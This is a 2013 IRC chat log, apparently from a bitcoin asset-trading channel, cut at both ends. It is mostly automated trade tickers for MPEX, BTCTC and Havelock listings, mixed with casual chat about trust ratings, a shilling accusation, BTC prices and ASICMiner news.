1341 @ 0.00195 = 2.615 BTC [+] Jun 29 03:58:17 [BTCTC] [AMC-PT] 1788 @ 0.001979 = 3.5385 BTC [+] Jun 29 03:58:18 [BTCTC] [AMC-PT] 835 @ 0.00198 = 1.6533 BTC [+] Jun 29 04:01:12 [MPEX] [S.DICE] 1500 @ 0.00219979 = 3.2997 BTC [-] Jun 29 04:01:14 [MPEX] [S.DICE] 250 @ 0.0021999 = 0.55 BTC [+] Jun 29 04:01:15 [MPEX] [S.DICE] 1703 @ 0.0022 = 3.7466 BTC [+] Jun 29 04:01:29 [MPEX] [S.DICE] 1175 @ 0.0023 = 2.7025 BTC [+] Jun 29 04:01:33 [MPEX] [S.DICE] 1000 @ 0.00233479 = 2.3348 BTC [+] Jun 29 04:01:35 [MPEX] [S.DICE] 1000 @ 0.00233481 = 2.3348 BTC [+] Jun 29 04:01:36 [MPEX] [S.DICE] 1000 @ 0.00233483 = 2.3348 BTC [+] Jun 29 04:01:46 [MPEX] [S.DICE] 1000 @ 0.00233485 = 2.3349 BTC [+] Jun 29 04:01:47 [MPEX] [S.DICE] 1000 @ 0.00233487 = 2.3349 BTC [+] Jun 29 04:02:00 [MPEX] [S.DICE] 1000 @ 0.00233489 = 2.3349 BTC [+] Jun 29 04:02:03 [MPEX] [S.DICE] 1000 @ 0.00249795 = 2.498 BTC [+] Jun 29 04:02:16 [BTCTC] [DMS.MINING] 1 @ 0.023363 BTC [+] Jun 29 04:02:19 [MPEX] [S.DICE] 200 @ 0.00249795 = 0.4996 BTC [+] Jun 29 04:02:20 [MPEX] [S.DICE] 1000 @ 0.00249797 = 2.498 BTC [+] Jun 29 04:02:30 [MPEX] [S.DICE] 1000 @ 0.00249799 = 2.498 BTC [+] Jun 29 04:02:34 [MPEX] [S.DICE] 1000 @ 0.00249997 = 2.5 BTC [+] Jun 29 04:02:50 [MPEX] [S.DICE] 1000 @ 0.00249999 = 2.5 BTC [+] Jun 29 04:02:52 [MPEX] [S.DICE] 215 @ 0.00265 = 0.5698 BTC [+] Jun 29 04:03:01 [MPEX] [S.DICE] 5000 @ 0.0028 = 14 BTC [+] Jun 29 04:03:06 [MPEX] [S.DICE] 2600000 @ 0.0028 = 7280 BTC [+] Jun 29 04:03:40 Quote from: Garr255 on Today at 12:33:36 AM Jun 29 04:03:40 Also, I encourage you to check out my existing mining ventures, as I have been commended for being one of the most transparant people in the industry. Jun 29 04:03:44 srs Jun 29 04:05:05 1 on black Jun 29 04:05:10 2 on red Jun 29 04:05:15 let this mofo burn Jun 29 04:05:41 ;;rate Garr255 -5 Garr255/Werner - Auction shilling https://bitcointalk.org/index.php?topic=238474.0 Jun 29 04:05:42 Rating entry successful. Your rating of -5 for user Garr255 has been recorded. Jun 29 04:06:52 is there a bitcoin-drunk? Jun 29 04:06:58 chan? Jun 29 04:07:11 there is if you join Jun 29 04:11:06 bitcoin-dumb should be mandatory Jun 29 04:11:40 o looksy, i just scammed somebody out of 8k Jun 29 04:11:53 where's teh trolls when you need 'em. Jun 29 04:12:05 urlpls Jun 29 04:12:38 whoa Jun 29 04:12:41 !t m s.dice Jun 29 04:12:42 [MPEX:S.DICE] 1D: 0.00219979 / 0.00279731 / 0.0028 (2621043 shares, 7,331.87 BTC), 7D: 0.00167639 / 0.002656 / 0.0028 (3182985 shares, 8,454.02 BTC), 30D: 0.00167639 / 0.00234253 / 0.00296096 (5901304 shares, 13,823.98 BTC) Jun 29 04:13:39 kakobrekla http://blockchain.info/address/1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx it's in there. Jun 29 04:14:08 [HAVELOCK] [HIM] 1 @ 0.3259 BTC [-] Jun 29 04:17:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.034099 BTC [+] Jun 29 04:18:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.034099 BTC [+] Jun 29 04:19:29 [BTCTC] [S.MPOE-PT] 1 @ 0.000994 BTC [+] Jun 29 04:22:01 [MPEX] [S.MPOE] 4537 @ 0.00082918 = 3.762 BTC [+] Jun 29 04:22:14 [MPEX] [S.MPOE] 713 @ 0.00082923 = 0.5912 BTC [+] Jun 29 04:25:35 [HAVELOCK] [HIM] 5 @ 0.32 = 1.6 BTC [-] Jun 29 04:26:39 What... that 10k deposit? Jun 29 04:26:57 Maybe I should have bought more S.DICE, but I'm holding fiat currently. Jun 29 04:27:30 I still find the price shaky since it burst upward. Jun 29 04:27:32 [MPEX] [S.MPOE] 7550 @ 0.00082923 = 6.2607 BTC [+] Jun 29 04:30:34 [BTCTC] [AMC-PT] 165 @ 0.0022 = 0.363 BTC [+] Jun 29 04:31:50 well if it weren't shakly it wouldn't be a share Jun 29 04:31:53 it'd be a bond :D Jun 29 04:32:18 i think he is talking about btc Jun 29 04:33:05 aye, talking about BTC/USD rate. Jun 29 04:34:07 [HAVELOCK] [HIM] 5 @ 0.32 = 1.6 BTC [-] Jun 29 04:34:16 [HAVELOCK] [VTX] 1 @ 0.482 BTC [-] Jun 29 04:36:07 I'd prefer to hold fiat for a while. Jun 29 04:38:52 o o Jun 29 04:39:14 wait, weren't you holding a bond ? Jun 29 04:39:24 what if btc goes to 200, you're fuckled then eh ? Jun 29 04:41:40 [BTCTC] [S.MPOE-PT] 17 @ 0.000994 = 0.0169 BTC [+] Jun 29 04:42:49 pft like that can happen Jun 29 04:44:43 ahhh i think i just got the most talented guy in the world to do voice work for teh game Jun 29 04:44:46 this rox. Jun 29 04:51:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.034099 = 0.1705 BTC [+] Jun 29 04:59:22 [BTCTC] [TAT.ASICMINER] 13 @ 0.0337 = 0.4381 BTC [-] Jun 29 04:59:54 [BTCTC] [AMC-PT] 15 @ 0.00196 = 0.0294 BTC [-] Jun 29 05:00:35 [BTCTC] [AMC-PT] 72 @ 0.00195 = 0.1404 BTC [-] Jun 29 05:00:47 ;;ticker Jun 29 05:00:48 MtGox BTCUSD ticker | Best bid: 93.97496, Best ask: 94.00000, Bid-ask spread: 0.02504, Last trade: 94.00000, 24 hour volume: 44072.39180777, 24 hour low: 92.25000, 24 hour high: 100.99000, 24 hour vwap: 96.29299 Jun 29 05:01:40 !ticker m s.mpoe Jun 29 05:01:42 [MPEX:S.MPOE] 1D: 0.00082357 / 0.00083005 / 0.00083673 (404131 shares, 335.45 BTC), 7D: 0.0007725 / 0.00080722 / 0.00083673 (2292976 shares, 1,850.95 BTC), 30D: 0.0006575 / 0.00076717 / 0.00083673 (59947399 shares, 45,990.13 BTC) Jun 29 05:03:24 mircea_popescu: how are you? Jun 29 05:03:25 [BTCTC] [DMS.MINING] 7 @ 0.023363 = 0.1635 BTC [+] Jun 29 05:03:29 great! Jun 29 05:04:28 you should wrangle up some EA defectors while you're at it :D Jun 29 05:05:00 hehe mebbe Jun 29 05:06:39 [BTCTC] [TAT.ASICMINER] 20 @ 0.033611 = 0.6722 BTC [-] Jun 29 05:08:29 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005171 = 0.0103 BTC [-] Jun 29 05:08:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00517 BTC [-] Jun 29 05:10:19 [BTCTC] [TAT.ASICMINER] 14 @ 0.033612 = 0.4706 BTC [+] Jun 29 05:11:06 [BTCTC] [ASICMINER-PT] 1 @ 3.439992 BTC [-] Jun 29 05:11:10 do they have netflix in romania? Jun 29 05:11:35 i have no idea. Jun 29 05:13:18 you can use your account anywhere, but i dunno whether they let you make one here. Jun 29 05:19:54 [MPEX] [S.MPOE] 1000 @ 0.00082822 = 0.8282 BTC [-] Jun 29 05:21:20 [MPEX] [S.MPOE] 15350 @ 0.00082731 = 12.6992 BTC [-] Jun 29 05:24:57 mircea, I still have BTC holdings exceeding my bond value. Jun 29 05:26:22 and not going to sell shares too low either just to hold fiat. Jun 29 05:26:54 I did buy some S.DICE but maybe I should have gotten more. But most of my liquid capital is in fiat currently. Jun 29 05:27:17 [BTCTC] [ASICMINER-PT] 1 @ 3.433 BTC [-] Jun 29 05:27:19 [BTCTC] [ASICMINER-PT] 1 @ 3.435 BTC [+] Jun 29 05:29:16 8000btc scam, wha? Jun 29 05:29:46 wait it's just a normal deposit and you are creatively bragging Jun 29 05:30:32 pretty much Jun 29 05:37:39 [BTCTC] [ASICMINER-PT] 1 @ 3.416 BTC [-] Jun 29 05:39:23 Apple signs chip manufacturing deal with TSMC Jun 29 05:39:38 thats the Avalon provider right? Jun 29 05:40:11 [BTCTC] [ASICMINER-PT] 1 @ 3.400006 BTC [-] Jun 29 05:40:16 [BTCTC] [ASICMINER-PT] 1 @ 3.400005 BTC [-] Jun 29 05:47:42 [BTCTC] [ASICMINER-PT] 1 @ 3.400005 BTC [-] Jun 29 05:49:59 [MPEX] [S.MPOE] 2500 @ 0.00082822 = 2.0706 BTC [+] Jun 29 05:50:01 [MPEX] [S.MPOE] 8815 @ 0.00082872 = 7.3052 BTC [+] Jun 29 05:50:02 [MPEX] [S.MPOE] 6679 @ 0.00082923 = 5.5384 BTC [+] Jun 29 05:50:09 [MPEX] [S.MPOE] 2906 @ 0.00082947 = 2.4104 BTC [+] Jun 29 05:55:09 [MPEX] [S.MPOE] 6600 @ 0.00082921 = 5.4728 BTC [-] Jun 29 05:55:10 [MPEX] [S.MPOE] 4400 @ 0.00082674 = 3.6377 BTC [-] Jun 29 05:55:26 [MPEX] [S.MPOE] 900 @ 0.00082668 = 0.744 BTC [-] Jun 29 05:55:44 [BTCTC] [DMS.SELLING] 10 @ 0.034477 = 0.3448 BTC [+] Jun 29 05:55:55 [BTCTC] [AMC-PT] 1428 @ 0.00195 = 2.7846 BTC [-] Jun 29 05:56:43 [BTCTC] [AMC-PT] 204 @ 0.001949 = 0.3976 BTC [-] Jun 29 06:00:11 [BTCTC] [AMC-PT] 331 @ 0.001504 = 0.4978 BTC [-] Jun 29 06:01:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.03376 BTC [+] Jun 29 06:01:26 [BTCTC] [ASICMINER-PT] 1 @ 3.423 BTC [+] Jun 29 06:02:46 [BTCTC] [ASICMINER-PT] 1 @ 3.448699 BTC [+] Jun 29 06:03:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.03376 BTC [+] Jun 29 06:03:47 [BTCTC] [AMC-PT] 1 @ 0.001504 BTC [-] Jun 29 06:04:09 [BTCTC] [AMC-PT] 330 @ 0.001504 = 0.4963 BTC [-] Jun 29 06:04:13 [BTCTC] [DMS.PURCHASE] 6 @ 0.053583 = 0.3215 BTC [-] Jun 29 06:06:09 [BTCTC] [AMC-PT] 175 @ 0.001503 = 0.263 BTC [-] Jun 29 06:06:32 [BTCTC] [AMC-PT] 1685 @ 0.001501 = 2.5292 BTC [-] Jun 29 06:08:07 [BTCTC] [ASICMINER-PT] 1 @ 3.43299 BTC [-] Jun 29 06:11:32 [MPEX] [S.MPOE] 2394 @ 0.00082947 = 1.9858 BTC [+] Jun 29 06:11:34 [MPEX] [S.MPOE] 8656 @ 0.00082966 = 7.1815 BTC [+] Jun 29 06:12:52 [BTCTC] [BASIC-MINING] 20 @ 0.209371 = 4.1874 BTC [+] Jun 29 06:13:05 [BTCTC] [AMC-PT] 1 @ 0.001501 BTC [-] Jun 29 06:14:18 [BTCTC] [AMC-PT] 614 @ 0.001501 = 0.9216 BTC [-] Jun 29 06:14:43 [BTCTC] [AMC-PT] 1 @ 0.0015 BTC [-] Jun 29 06:14:45 [BTCTC] [AMC-PT] 2000 @ 0.0015 = 3 BTC [-] Jun 29 06:20:55 [BTCTC] [ASICMINER-PT] 1 @ 3.43299 BTC [-] Jun 29 06:22:36 [BTCTC] [S.BBET-PT] 1 @ 0.00132 BTC [-] Jun 29 06:22:37 [BTCTC] [S.BBET-PT] 28 @ 0.00131 = 0.0367 BTC [-] Jun 29 06:28:27 ;;seen vbs Jun 29 06:28:27 vbs was last seen in #bitcoin-assets 14 hours, 20 minutes, and 33 seconds ago: hahaha Jun 29 06:28:46 ;;later tell vbs amc new facebook :D Jun 29 06:28:46 The operation succeeded. Jun 29 06:28:50 Namworld a so then, not exactly "holding fiat" Jun 29 06:29:28 [BTCTC] [DMS.PURCHASE] 100 @ 0.053583 = 5.3583 BTC [-] Jun 29 06:31:10 [BTCTC] [AMC-PT] 2 @ 0.0016 = 0.0032 BTC [+] Jun 29 06:32:41 [BTCTC] [ASICMINER-PT] 1 @ 3.400009 BTC [-] Jun 29 06:32:43 [BTCTC] [ASICMINER-PT] 1 @ 3.400007 BTC [-] Jun 29 06:32:55 [BTCTC] [COGNITIVE] 1 @ 0.492001 BTC [-] Jun 29 06:33:26 mircea_popescu: who's the most talented voice actor? Jun 29 06:34:06 this guy. Jun 29 06:34:29 [BTCTC] [COGNITIVE] 2 @ 0.492 = 0.984 BTC [-] Jun 29 06:34:29 ah. Jun 29 06:34:33 lol Jun 29 06:35:01 [BTCTC] [COGNITIVE] 1 @ 0.47 BTC [-] Jun 29 06:35:03 [BTCTC] [TAT.ASICMINER] 16 @ 0.034199 = 0.5472 BTC [+] Jun 29 06:35:04 [BTCTC] [COGNITIVE] 1 @ 0.46 BTC [-] Jun 29 06:35:06 [BTCTC] [COGNITIVE] 7 @ 0.451 = 3.157 BTC [-] Jun 29 06:35:07 [BTCTC] [TAT.ASICMINER] 11 @ 0.0342 = 0.3762 BTC [+] Jun 29 06:36:21 [BTCTC] [COGNITIVE] 3 @ 0.45 = 1.35 BTC [-] Jun 29 06:36:39 [BTCTC] [AMC-PT] 2488 @ 0.0015 = 3.732 BTC [-] Jun 29 06:37:43 [BTCTC] [ASICMINER-PT] 1 @ 3.4339 BTC [+] Jun 29 06:38:25 [BTCTC] [AMC-PT] 100 @ 0.0016 = 0.16 BTC [+] Jun 29 06:39:48 [BTCTC] [BASIC-MINING] 40 @ 0.209342 = 8.3737 BTC [-] Jun 29 06:40:19 [HAVELOCK] [SDICE] 2 @ 0.18699497 = 0.374 BTC [+] Jun 29 06:41:44 [BTCTC] [COGNITIVE] 1 @ 0.524999 BTC [+] Jun 29 06:45:19 [BTCTC] [ASICMINER-PT] 1 @ 3.400011 BTC [-] Jun 29 06:46:11 [BTCTC] [AMC-PT] 398 @ 0.0016 = 0.6368 BTC [+] Jun 29 06:54:52 [BTCTC] [DMS.PURCHASE] 50 @ 0.053583 = 2.6792 BTC [-] Jun 29 06:56:45 [HAVELOCK] [HIM] 4 @ 0.328999 = 1.316 BTC [+] Jun 29 06:57:12 [BTCTC] [ASICMINER-PT] 1 @ 3.400014 BTC [+] Jun 29 06:57:21 [BTCTC] [AMC-PT] 662 @ 0.001654 = 1.0949 BTC [+] Jun 29 06:57:23 [BTCTC] [AMC-PT] 500 @ 0.001655 = 0.8275 BTC [+] Jun 29 07:03:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0339 BTC [-] Jun 29 07:03:28 [BTCTC] [TAT.ASICMINER] 14 @ 0.033613 = 0.4706 BTC [-] Jun 29 07:09:08 [HAVELOCK] [VTX] 1 @ 0.47 BTC [-] Jun 29 07:09:22 [BTCTC] [AMC-PT] 500 @ 0.0017 = 0.85 BTC [+] Jun 29 07:12:25 mircea_popescu: vidya gaaaames Jun 29 07:19:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0339 BTC [+] Jun 29 07:19:39 [BTCTC] [TAT.ASICMINER] 36 @ 0.033613 = 1.2101 BTC [-] Jun 29 07:19:41 [BTCTC] [TAT.ASICMINER] 45 @ 0.033606 = 1.5123 BTC [-] Jun 29 07:19:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.0336 = 0.0672 BTC [-] Jun 29 07:19:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.0336 = 0.1008 BTC [-] Jun 29 07:19:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.03355 = 0.1678 BTC [-] Jun 29 07:19:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.033542 = 0.2683 BTC [-] Jun 29 07:21:44 [MPEX] [S.MG] 2999 @ 0.00015 = 0.4499 BTC [+] Jun 29 07:21:49 [BTCTC] [S.DICE-PT] 1 @ 0.001868 BTC [+] Jun 29 07:23:00 [BTCTC] [DMS.PURCHASE] 100 @ 0.053583 = 5.3583 BTC [-] Jun 29 07:23:29 [BTCTC] [DMS.PURCHASE] 52 @ 0.053583 = 2.7863 BTC [-] Jun 29 07:23:56 [BTCTC] [DMS.PURCHASE] 5 @ 0.053583 = 0.2679 BTC [-] Jun 29 07:25:57 ;;seen amc Jun 29 07:25:57 I have not seen amc. Jun 29 07:26:02 ;;seen AMC Jun 29 07:26:02 I have not seen AMC. Jun 29 07:26:44 "For the record. At around 0.0008 - 0.001 I consider AMC worth a high risk investment. Not based on profit projections from the Avalon clones (that I consider 100% outrageous) but based on the fact that I dont think Ken is trying to scam anyone, he just does not understand how diff increase, hash rate and financing works." Jun 29 07:30:47 [BTCTC] [DMS.MINING] 52 @ 0.023 = 1.196 BTC [-] Jun 29 07:31:21 [BTCTC] [DMS.PURCHASE] 22 @ 0.053583 = 1.1788 BTC [-] Jun 29 07:32:30 [BTCTC] [DMS.SELLING] 20 @ 0.032001 = 0.64 BTC [-] Jun 29 07:35:27 [BTCTC] [AMC-PT] 200 @ 0.0017 = 0.34 BTC [+] Jun 29 07:35:47 [BTCTC] [DMS.MINING] 48 @ 0.023 = 1.104 BTC [-] Jun 29 07:35:49 [BTCTC] [DMS.MINING] 10 @ 0.0221 = 0.221 BTC [-] Jun 29 07:35:50 [BTCTC] [DMS.MINING] 50 @ 0.021001 = 1.0501 BTC [-] Jun 29 07:36:18 [BTCTC] [DMS.PURCHASE] 40 @ 0.053583 = 2.1433 BTC [-] Jun 29 07:36:48 [BTCTC] [ASICMINER-PT] 1 @ 3.400014 BTC [+] Jun 29 07:40:34 [BTCTC] [ASICMINER-PT] 1 @ 3.400014 BTC [+] Jun 29 07:41:45 [BTCTC] [DMS.MINING] 20 @ 0.021002 = 0.42 BTC [+] Jun 29 07:41:47 [BTCTC] [DMS.MINING] 20 @ 0.021001 = 0.42 BTC [-] Jun 29 07:42:12 [BTCTC] [DMS.PURCHASE] 20 @ 0.053583 = 1.0717 BTC [-] Jun 29 07:42:50 [HAVELOCK] [ASICM] 54 @ 0.03328799 = 1.7976 BTC [+] Jun 29 07:43:05 [BTCTC] [DMS.MINING] 6 @ 0.023362 = 0.1402 BTC [+] Jun 29 07:44:35 [BTCTC] [DMS.MINING] 20 @ 0.023363 = 0.4673 BTC [+] Jun 29 07:50:51 [BTCTC] [DMS.SELLING] 3 @ 0.032 = 0.096 BTC [-] Jun 29 07:50:53 [BTCTC] [DMS.SELLING] 17 @ 0.0314 = 0.5338 BTC [-] Jun 29 07:50:55 [BTCTC] [DMS.SELLING] 6 @ 0.0314 = 0.1884 BTC [-] Jun 29 07:51:32 [BTCTC] [DMS.PURCHASE] 20 @ 0.053583 = 1.0717 BTC [-] Jun 29 07:52:22 [BTCTC] [AMC-PT] 349 @ 0.001426 = 0.4977 BTC [-] Jun 29 07:52:45 [BTCTC] [AMC-PT] 151 @ 0.001425 = 0.2152 BTC [-] Jun 29 07:53:28 [BTCTC] [DMS.PURCHASE] 6 @ 0.053583 = 0.3215 BTC [-] Jun 29 07:53:43 [HAVELOCK] [ASICM] 2 @ 0.03328799 = 0.0666 BTC [+] Jun 29 07:53:47 [HAVELOCK] [SDICE] 1 @ 0.18000001 BTC [-] Jun 29 07:53:48 [HAVELOCK] [SDICE] 2 @ 0.18 = 0.36 BTC [-] Jun 29 07:54:39 [BTCTC] [AMC-PT] 299 @ 0.001425 = 0.4261 BTC [-] Jun 29 07:57:36 [BTCTC] [TAT.ASICMINER] 30 @ 0.034 = 1.02 BTC [+] Jun 29 07:58:33 [HAVELOCK] [ASICM] 3 @ 0.03328799 = 0.0999 BTC [+] Jun 29 08:00:15 [BTCTC] [AMC-PT] 398 @ 0.00165 = 0.6567 BTC [+] Jun 29 08:00:16 [BTCTC] [TAT.ASICMINER] 18 @ 0.034 = 0.612 BTC [+] Jun 29 08:01:35 [BTCTC] [AMC-PT] 194 @ 0.001648 = 0.3197 BTC [-] Jun 29 08:02:45 [BTCTC] [AMC-PT] 31 @ 0.001646 = 0.051 BTC [-] Jun 29 08:06:58 [HAVELOCK] [ASICM] 1 @ 0.03328799 BTC [+] Jun 29 08:09:18 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [-] Jun 29 08:10:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.03387 BTC [-] Jun 29 08:10:11 [BTCTC] [TAT.ASICMINER] 49 @ 0.033543 = 1.6436 BTC [-] Jun 29 08:11:36 [BTCTC] [ASICMINER-PT] 1 @ 3.400014 BTC [+] Jun 29 08:13:27 ergh, it's always the edge cases.. whenever there was a trade of only 1 share, coinflow would create an extra ticker for it. Jun 29 08:14:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.034197 = 0.6839 BTC [+] Jun 29 08:24:10 lmao Jun 29 08:24:34 "I dont think Ken is trying to scam anyone, he just does not understand how diff increase, hash rate and financing works." Jun 29 08:24:39 thus why shouldn't he be doing this ?! **** BEGIN LOGGING AT Sat Jun 29 16:47:34 2013 Jun 29 16:49:42 deadweasel lol the girl's better. Jun 29 16:51:58 i negrated Garr and that was enough to redden his Trust and make him go negative Jun 29 16:52:32 apparently he manipulated a sleeping asset on BTCT to skirt the requirements for listing in this new bond offering Jun 29 16:52:35 speaking of garr Jun 29 16:52:36 [HAVELOCK] [ASICM] 19 @ 0.033501 = 0.6365 BTC [+] Jun 29 16:52:39 why am i alone here Jun 29 16:52:40 https://bitcointalk.org/index.php?topic=245375.20 Jun 29 16:52:43 [HAVELOCK] [ASICM] 481 @ 0.033501 = 16.114 BTC [+] Jun 29 16:52:47 [FIMB] Fixed-Interest-Mining-Bond on BTC-TC Jun 29 16:53:01 that's why i negrated him kako Jun 29 16:53:21 it triggered the warning under his name now Jun 29 16:53:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.034877 BTC [+] Jun 29 16:53:26 Warning: Trade with extreme caution! Jun 29 16:53:40 yeah for you and people in your network or smth Jun 29 16:53:44 pretty much the new scammer tag Jun 29 16:53:51 not for everyone Jun 29 16:53:55 oh so you don't see it? Jun 29 16:53:57 retarded Jun 29 16:54:16 wait i rated you so you would see it Jun 29 16:54:21 yes i see it Jun 29 16:54:23 others dont Jun 29 16:54:26 lame Jun 29 16:54:27 afaik Jun 29 16:56:05 [HAVELOCK] [ASICM] 19 @ 0.033501 = 0.6365 BTC [+] Jun 29 16:57:07 im pretty sure you two are in everyone's network. Jun 29 16:57:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.034877 BTC [+] Jun 29 16:57:41 [HAVELOCK] [SDICE] 1 @ 0.171999 BTC [+] Jun 29 16:57:53 and ofr that matter https://bitcointalk.org/index.php?topic=245375.msg2604415#msg2604415 kakobrekla Jun 29 16:58:35 heh Jun 29 16:58:50 meh people dont lissen Jun 29 16:59:26 [HAVELOCK] [ASICM] 103 @ 0.03399997 = 3.502 BTC [+] Jun 29 17:01:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.034877 = 0.0698 BTC [+] Jun 29 17:02:05 [BTCTC] [ASICMINER-PT] 9 @ 3.562 = 32.058 BTC [+] Jun 29 17:02:08 [BTCTC] [ASICMINER-PT] 1 @ 3.563 BTC [+] Jun 29 17:02:30 Interesting ASICminer news (not yet confirmed, translated from a Chinese live presentation) https://bitcointalk.org/index.php?topic=99497.msg2611059#msg2611059 Jun 29 17:02:31 [BTCTC] [TAT.ASICMINER] 16 @ 0.034877 = 0.558 BTC [+] Jun 29 17:03:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.034975 BTC [+] Jun 29 17:03:20 [BTCTC] [AMC-PT] 10 @ 0.00199 = 0.0199 BTC [-] Jun 29 17:03:27 [BTCTC] [TAT.ASICMINER] 49 @ 0.034975 = 1.7138 BTC [+] Jun 29 17:03:45 [BTCTC] [AMC-PT] 2 @ 0.00199 = 0.004 BTC [-] Jun 29 17:03:51 [BTCTC] [TAT.ASICMINER] 9 @ 0.03499 = 0.3149 BTC [+] Jun 29 17:04:27 [BTCTC] [TAT.ASICMINER] 20 @ 0.035 = 0.7 BTC [+] Jun 29 17:04:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.035 = 0.14 BTC [+] Jun 29 17:04:58 [HAVELOCK] [ASICM] 29 @ 0.03399997 = 0.986 BTC [+] Jun 29 17:05:45 teh point where the english speaking investors await with bated breath someone bother to translate from the master language is pretty lulzy. Jun 29 17:06:17 [BTCTC] [ASICMINER-PT] 1 @ 3.562 BTC [-] Jun 29 17:06:18 a lesson in there still nobody wants to even consider let alone internalize. Jun 29 17:07:20 hehe Jun 29 17:07:58 [HAVELOCK] [ASICM] 18 @ 0.03399997 = 0.612 BTC [+] Jun 29 17:08:29 [HAVELOCK] [ASICM] 141 @ 0.03399998 = 4.794 BTC [+] Jun 29 17:08:41 [BTCTC] [ASICMINER-PT] 1 @ 3.562999 BTC [+] Jun 29 17:10:07 [BTCTC] [AMC-PT] 5 @ 0.00199 = 0.01 BTC [-] Jun 29 17:12:19 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [+] Jun 29 17:13:15 [BTCTC] [ASICMINER-PT] 1 @ 3.56 BTC [-] Jun 29 17:13:23 [BTCTC] [ASICMINER-PT] 8 @ 3.455001 = 27.64 BTC [-] Jun 29 17:13:46 [BTCTC] [TAT.ASICMINER] 50 @ 0.034601 = 1.7301 BTC [-] Jun 29 17:14:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.0346 = 0.346 BTC [-] Jun 29 17:14:39 [BTCTC] [TAT.ASICMINER] 15 @ 0.0345 = 0.5175 BTC [-] Jun 29 17:15:17 [HAVELOCK] [SDICE] 3 @ 0.172 = 0.516 BTC [+] Jun 29 17:18:49 [HAVELOCK] [SDICE] 2 @ 0.172 = 0.344 BTC [+] Jun 29 17:19:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.034999 = 0.35 BTC [+] Jun 29 17:21:03 [BTCTC] [BASIC-MINING] 8 @ 0.182007 = 1.4561 BTC [-] Jun 29 17:21:05 [BTCTC] [BASIC-MINING] 10 @ 0.182 = 1.82 BTC [-] Jun 29 17:21:26 [BTCTC] [CRYPTO-TRADE] 15 @ 0.2 = 3 BTC [+] Jun 29 17:23:58 [MPEX] [S.MPOE] 50 @ 0.00082428 = 0.0412 BTC [-] Jun 29 17:24:03 [MPEX] [S.MPOE] 4750 @ 0.00082406 = 3.9143 BTC [-] Jun 29 17:24:07 [BTCTC] [TAT.ASICMINER] 40 @ 0.034999 = 1.4 BTC [+] Jun 29 17:24:19 [BTCTC] [TAT.ASICMINER] 30 @ 0.0345 = 1.035 BTC [-] Jun 29 17:24:51 [BTCTC] [BASIC-MINING] 2 @ 0.181818 = 0.3636 BTC [-] Jun 29 17:26:08 [BTCTC] [TAT.ASICMINER] 62 @ 0.035 = 2.17 BTC [+] Jun 29 17:26:12 [BTCTC] [TAT.ASICMINER] 30 @ 0.035 = 1.05 BTC [+] Jun 29 17:26:14 [BTCTC] [TAT.ASICMINER] 8 @ 0.035 = 0.28 BTC [+] Jun 29 17:26:25 [BTCTC] [ASICMINER-PT] 2 @ 3.549 = 7.098 BTC [+] Jun 29 17:27:24 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Jun 29 17:28:02 [BTCTC] [CRYPTO-TRADE] 17 @ 0.2 = 3.4 BTC [+] Jun 29 17:29:24 [BTCTC] [CRYPTO-TRADE] 15 @ 0.2 = 3 BTC [+] Jun 29 17:29:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.035 = 0.105 BTC [+] Jun 29 17:30:34 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jun 29 17:31:59 [BTCTC] [ASICMINER-PT] 1 @ 3.545 BTC [-] Jun 29 17:32:01 [BTCTC] [ASICMINER-PT] 1 @ 3.549 BTC [+] Jun 29 17:32:14 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jun 29 17:32:20 [BTCTC] [TAT.ASICMINER] 40 @ 0.034999 = 1.4 BTC [-] Jun 29 17:32:35 [HAVELOCK] [ASICM] 59 @ 0.03399 = 2.0054 BTC [-] Jun 29 17:32:36 [BTCTC] [AMC-PT] 99 @ 0.001998 = 0.1978 BTC [+] Jun 29 17:32:54 [HAVELOCK] [ASICM] 24 @ 0.034 = 0.816 BTC [+] Jun 29 17:32:55 [HAVELOCK] [ASICM] 4 @ 0.034 = 0.136 BTC [+] Jun 29 17:33:21 [HAVELOCK] [ASICM] 6 @ 0.0341 = 0.2046 BTC [+] Jun 29 17:34:00 [BTCTC] [DMS.SELLING] 1 @ 0.033478 BTC [+] Jun 29 17:36:37 [BTCTC] [TAT.ASICMINER] 30 @ 0.03475 = 1.0425 BTC [-] Jun 29 17:37:47 [BTCTC] [TAT.ASICMINER] 60 @ 0.035 = 2.1 BTC [+] Jun 29 17:37:49 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.004852 = 0.034 BTC [-] Jun 29 17:42:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [+] Jun 29 17:43:04 [BTCTC] [ASICMINER-PT] 1 @ 3.548 BTC [-] Jun 29 17:44:16 [BTCTC] [TAT.ASICMINER] 100 @ 0.035 = 3.5 BTC [+] Jun 29 17:44:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.035 = 0.14 BTC [+] Jun 29 17:49:11 https://bitcointalk.org/index.php?topic=246182.0;topicseen Jun 29 17:49:16 Sonny Vleisides' finally sticking it up his investors' asses! Jun 29 17:49:23 ThickAsThieves: you're from Atlanta no? Jun 29 17:49:34 [BTCTC] [AMC-PT] 4 @ 0.00199 = 